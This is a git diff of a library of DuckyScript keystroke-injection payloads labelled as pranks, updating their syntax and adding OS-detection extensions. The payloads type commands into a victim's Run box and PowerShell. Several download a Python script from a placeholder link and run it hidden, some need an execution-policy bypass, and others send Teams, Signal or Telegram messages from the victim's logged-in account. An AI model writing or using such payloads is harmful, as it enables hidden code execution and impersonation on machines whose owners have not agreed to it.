+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 1500
REM Create the file
-STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
+STRING New-Item -Path ".\script.py" -ItemType "file" -Force;
REM Write the code into the file
-STRING Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
-ENTER
+STRINGLN Set-Content -Path ".\script.py" -Value "import os; from time import sleep; os.system('pip install pyttsx3'); import pyttsx3; sleep(60); alien_message = 'Greetings to the inhabitants of planet Earth. I am an alien from a distant planet named Hak5 and I have taken control of this computer to communicate with you. I want to announce to you that in exactly one year\'s time our invasion fleet will arrive on your planet because we have heard that you make very good fries. Resistance is useless. Your only option is to give us all the fries you have and to produce as many as possible to satiate us. Your planet will become a potato chip colony and you will produce forever. Get ready, earthlings. Our hunger is near.'; motore = pyttsx3.init(); voce_alienea = motore.getProperty('voices')[1]; motore.setProperty('voice', voce_alienea.id); motore.setProperty('pitch', 70); motore.say(alien_message); motore.runAndWait();"
DELAY 1000
REM Execute the Python script
-STRING Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
-ENTER
+STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
REM Close the PowerShell
DELAY 1000
diff --git a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
index 704dd3f..151a556 100644
--- a/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
+++ b/payloads/library/prank/Change Wallpaper With Screenshot/payload.txt
@@ -1,36 +1,72 @@
-REM ######################################################
-REM # |
-REM # Title : Change Wallpaper With Screenshot |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ######################################################
-
-
-REM Requirements:
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+REM_BLOCK
+######################################################
+# #
+# Title : Change Wallpaper With Screenshot #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+######################################################
+Requirements:
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
+END_REM
REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
-
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
index 3158172..2305c40 100644
--- a/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
+++ b/payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
@@ -1,39 +1,58 @@
-REM ###########################################
-REM # |
-REM # Title : Change Desktop Wallpaper |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Linux (KDE based) |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Change Desktop Wallpaper #
+# Author : Aleff #
+# Version : 1.1 #
+# Category : Prank #
+# Target : Linux (KDE based) #
+# #
+###########################################
-REM Requirements:
-REM - Internet Connection
+Requirements:
+ - Internet Connection
+END_REM
+
+REM Replace 'example.com/IMAGE_NAME' with your image link
+DEFINE #IMAGE_LINK example.com/IMAGE_NAME
+
+REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
+DEFINE #IMAGE_PATH="file://example.jpg"
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-REM Replace 'example.com/IMAGE_NAME' with your image link
-DEFINE IMAGE_LINK example.com/IMAGE_NAME
-STRING wget
-STRING IMAGE_LINK
-ENTER
-
-REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
-DEFINE IMAGE_PATH="file://example.jpg"
+STRINGLN wget #IMAGE_LINK
REM It depends by the Internet Connection
DELAY 2000
-STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")
diff --git a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
index b6bc903..e304170 100644
--- a/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
+++ b/payloads/library/prank/Full-ScreenBannerJoke/payload.txt
@@ -1,36 +1,73 @@
-
-REM ############################################
-REM # |
-REM # Title : Full-Screen Banner Joke |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ############################################
+REM_BLOCK
+############################################
+# #
+# Title : Full-Screen Banner Joke #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+############################################
-REM Requirements:
-REM - Internet Connection
-REM - Python installed
-REM - ExecutionPolicy Bypass
-
+Requirements:
+ - Internet Connection
+ - Python installed
+ - ExecutionPolicy Bypass
+END_REM
REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
index d3c0e85..1ea18b0 100644
--- a/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
+++ b/payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
@@ -1,29 +1,69 @@
-REM ##################################################
-REM # |
-REM # Title : Play A Song Through Spotify |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ##################################################
-
-
-REM Requirements:
-REM - Internet Connection
-REM - Spotify installed and user logged-in
-REM - ExecutionPolicy Bypass
+REM_BLOCK
+##################################################
+# #
+# Title : Play A Song Through Spotify #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+##################################################
+Requirements:
+ - Internet Connection
+ - Spotify installed and user logged-in
+ - ExecutionPolicy Bypass
+END_REM
REM REQUIRED - Set your song name
-DEFINE SONG-NAME example
+DEFINE #SONG-NAME example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
STRINGLN Start-Process "spotify://"
@@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
REM ESCAPE
REM DELAY 500
-STRING SONG-NAME
-ENTER
+STRINGLN #SONG-NAME
DELAY 1000
TAB
DELAY 500
diff --git a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
index 3712631..9b5b0ed 100644
--- a/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
+++ b/payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
@@ -1,12 +1,14 @@
-REM #####################################################
-REM # #
-REM # Title : Prank In The Middle - Thunderbird #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Prank #
-REM # Target : Windows 10/11 #
-REM # #
-REM #####################################################
+REM_BLOCK
+#####################################################
+# #
+# Title : Prank In The Middle - Thunderbird #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+#####################################################
+END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
@@ -38,8 +40,7 @@ END_EXTENSION
REM Open Thunderbird and goto settings
GUI r
-STRING thunderbird
-ENTER
+STRINGLN thunderbird
DELAY 1000
REPEAT 4 TAB
ENTER
@@ -70,8 +71,7 @@ DELAY 500
REM Open the powershell and goto the directory
GUI r
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 1500
STRING cd
DELAY 500
diff --git a/payloads/library/prank/SendMessagesInTeams/payload.txt b/payloads/library/prank/SendMessagesInTeams/payload.txt
index 3ff4497..0212ff9 100644
--- a/payloads/library/prank/SendMessagesInTeams/payload.txt
+++ b/payloads/library/prank/SendMessagesInTeams/payload.txt
@@ -1,37 +1,82 @@
-REM ###########################################
-REM # |
-REM # Title : Send Messages In Teams |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10-11 |
-REM # |
-REM ###########################################
+REM_BLOCK
+###########################################
+# #
+# Title : Send Messages In Teams #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10-11 #
+# #
+###########################################
-REM Requirements:
-REM - Microsoft Teams installed and user logged-in
-REM - Internet Connection
-REM - ExecutionPolicy Bypass
-REM - Python
+Requirements:
+ - Microsoft Teams installed and user logged-in
+ - Internet Connection
+ - ExecutionPolicy Bypass
+ - Python
-REM 1. Open a powershell
-REM 2. Close if Teams is opens and reopen it
-REM 3. Goto search bar
-REM 4. Search the person by name, email, id or what you want...
-REM 5. Downarrow and enter to open the chat
+1. Open a powershell
+2. Close if Teams is opens and reopen it
+3. Goto search bar
+4. Search the person by name, email, id or what you want...
+5. Downarrow and enter to open the chat
+END_REM
REM REQUIRED - Name, email, id or what you want for contact the target
-DEFINE USER-ID example
-REM REQUIRED - Messages
-DEFINE MESSAGE1 example
-REM ...
-REM DEFINE MESSAGEN example..
+DEFINE #USER-ID example
+
+REM REQUIRED - Messages
+DEFINE #MESSAGE1 example
+
+REM ...
+REM DEFINE #MESSAGEN example..
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 1000
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 2000
REM #### Powershell ####
@@ -44,8 +89,7 @@ DELAY 10000
REM #### Teams ####
CTRL N
DELAY 2000
-STRING USER-ID
-ENTER
+STRINGLN #USER-ID
DELAY 2000
TAB
DELAY 1000
@@ -53,11 +97,10 @@ TAB
DELAY 1000
REM #### Messages ####
-STRING MESSAGE1
-ENTER
+STRINGLN #MESSAGE1
DELAY 1000
REM ...
-REM STRINGLN MESSAGEN
+REM STRINGLN #MESSAGEN
DELAY 500
ALT F4
diff --git a/payloads/library/prank/SendSignalMessages/payload.txt b/payloads/library/prank/SendSignalMessages/payload.txt
index 71c5263..95bee72 100644
--- a/payloads/library/prank/SendSignalMessages/payload.txt
+++ b/payloads/library/prank/SendSignalMessages/payload.txt
@@ -1,41 +1,83 @@
-REM #########################################
-REM # |
-REM # Title : Send Signal Messages |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank, Execution |
-REM # Target : Windows 10-11 |
-REM # |
-REM #########################################
+REM_BLOCK
+#########################################
+# #
+# Title : Send Signal Messages #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank, Execution #
+# Target : Windows 10-11 #
+# #
+#########################################
-REM Requirements:
-REM - Internet Connection
-REM - Signal App installed
-REM Payload Plug-And-Play but can be edited as you want the message
+Requirements:
+ - Internet Connection
+ - Signal App installed
+Payload Plug-And-Play but can be edited as you want the message
+END_REM
REM REQUIRED - Receiver number
-DEFINE NUMBER 3332211000
+DEFINE #NUMBER 3332211000
REM REQUIRED - Message to send
-DEFINE MESSAGE YOUR_MESSAGE
+DEFINE #MESSAGE example
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Stop-Process -Name "Signal"
-ENTER
-STRING Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
-ENTER
+STRINGLN Stop-Process -Name "Signal"
+DELAY 500
+STRINGLN Start-Process $Env:USERPROFILE\AppData\Local\Programs\signal-desktop\Signal.exe; exit
DELAY 5000
TAB
TAB
TAB
ENTER
DELAY 100
-STRING NUMBER
+STRING #NUMBER
DELAY 100
TAB
DELAY 100
@@ -44,8 +86,7 @@ DELAY 200
REM This is the message that will be sent.
REM You can change it as you want, if you want.
-STRING YOUR_MESSAGE
-ENTER
+STRINGLN #MESSAGE
REM Closing Signal App
DELAY 500
diff --git a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
index 10ab2b3..0d057ed 100644
--- a/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
+++ b/payloads/library/prank/SendTelegramMessages_Linux/payload.txt
@@ -1,37 +1,64 @@
-
-REM #########################################
-REM # |
-REM # Title : Send Telegram Messages |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Linux |
-REM # |
-REM #########################################
+REM_BLOCK
+#########################################
+# #
+# Title : Send Telegram Messages #
+# Author : Aleff #
+# Version : 1.1 #
+# Category : Prank #
+# Target : Linux #
+# #
+#########################################
-REM Requirements:
-REM - Internet Connection
-REM - telegram-desktop installed and activated
+Requirements:
+ - Internet Connection
+ - telegram-desktop installed and activated
+END_REM
+
+REM Define the message receiver username
+DEFINE #USERNAME @example
+
+REM Define the message(s)
+DEFINE #MESSAGE1 example
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-STRING telegram-desktop
-ENTER
+STRINGLN telegram-desktop
REM It depends by the computer...
DELAY 3000
-REM Define the message receiver username
-DEFINE USERNAME @example
-STRING USERNAME
-ENTER
+STRINGLN #USERNAME
DELAY 500
-REM Define the message(s)
-DEFINE MESSAGE1 example
-STRING MESSAGE1
-ENTER
+STRINGLN #MESSAGE1
DELAY 500
REM other messages here...
REM ...
diff --git a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
index 9abbe92..8c4fa42 100644
--- a/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
+++ b/payloads/library/prank/The_Mouse_Moves_By_Itself/payload.txt
@@ -1,33 +1,70 @@
-REM ############################################
-REM # |
-REM # Title : The Mouse Moves By Itself |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ############################################
-
-
-REM Requirements:
-REM - Internet Connection
+REM_BLOCK
+############################################
+# #
+# Title : The Mouse Moves By Itself #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+############################################
+Requirements:
+ - Internet Connection
+END_REM
REM REQUIRED - Set your Python script link
-DEFINE SCRIPT-PY-LINK example.com
+DEFINE #SCRIPT-PY-LINK example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
-STRING Invoke-WebRequest -Uri "
-STRING SCRIPT-PY-LINK
-STRING " -OutFile "script.py"
-ENTER
+STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden
diff --git a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
index e6ee5ab..c2f036f 100644
--- a/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
+++ b/payloads/library/prank/This_damn_shell_doesn_t_work___so_sad!/payload.txt
@@ -1,15 +1,18 @@
-REM ############################################################
-REM # #
-REM # Title : This damn shell doesn't work, SO SAD! :C #
-REM # Author : Aleff #
-REM # Version : 1.0 #
-REM # Category : Prank #
-REM # Target : Linux #
-REM # #
-REM ############################################################
+REM_BLOCK
+############################################################
+# #
+# Title : This damn shell doesn't work, SO SAD! :C #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Linux #
+# #
+############################################################
+
+Requirements:
+ - Nothing <3
+END_REM
-REM Requirements:
-REM - Nothing <3
REM With Kali Linux 2020.4, the new default shell is now ZSH for users who install the distribution.
DEFINE #TARGET_KALI_LINUX TRUE
diff --git a/payloads/library/prank/Try_To_Catch_Me/payload.txt b/payloads/library/prank/Try_To_Catch_Me/payload.txt
index d9eb8e7..84d591e 100644
--- a/payloads/library/prank/Try_To_Catch_Me/payload.txt
+++ b/payloads/library/prank/Try_To_Catch_Me/payload.txt
@@ -1,27 +1,26 @@
-REM ####################################
-REM # |
-REM # Title : Try To Catch Me |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Prank |
-REM # Target : Windows 10/11 |
-REM # |
-REM ####################################
+REM_BLOCK
+####################################
+# #
+# Title : Try To Catch Me #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Prank #
+# Target : Windows 10/11 #
+# #
+####################################
-
-REM Requirements:
-REM - Python
-REM - Internet Connection
+Requirements:
+ - Python
+ - Internet Connection
+END_REM
REM REQUIRED - Set your Python script link
DEFINE #SCRIPT-PY-LINK example.com
-
DELAY 1000
GUI r
DELAY 500
-STRING powershell
-ENTER
+STRINGLN powershell
DELAY 500
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"